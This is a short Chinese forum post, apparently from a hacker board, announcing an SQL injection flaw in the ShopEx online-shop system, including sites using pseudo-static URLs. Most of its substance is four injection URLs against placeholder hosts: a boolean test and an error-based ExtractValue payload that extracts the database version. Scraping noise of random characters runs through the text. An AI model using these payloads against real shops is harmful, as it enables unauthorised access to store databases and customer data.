注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
, j* T& a5 Z$ g% @5 i% a" t/ `$ L. j8 R% N. p9 Z0 j
好吧,我扯远了~~- R& \ N9 h* C* Q
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
) p; v/ z: |& ]$ m不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
: R5 H- K5 ^" g' ?; ^" w* t1 d2 y0 Z4 K, {' g8 Y
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
" Y. [) i% ^1 E0 z% V2 _
1 l1 z; u) `, w* ~: W% \- khttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
7 L! Y7 B6 X- ?# H, f `) t7 c4 [ L. \: k# X$ v2 H+ ?+ m( Z
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html % B Q% _1 p) j4 t/ D
5 ~0 n* a; z3 s4 _* }4 Uhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
* w V8 L: _: O5 }
) z; e4 C' z4 S/ T
9 |5 r% x; T$ o4 f. E; {" N7 e6 ?一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
9 R/ d, t5 N' a如何注入就不多说了,10多年的东西了…不会也会了… ; A4 t8 O, x, o! b# W9 [0 q) R
# ~8 O- N# k, ?% D- Y! Z) y5 @- ~, I6 V0 u9 t9 l
8 V. a ~! z; ]
9 x5 o% A8 W* {) H8 n' G3 k |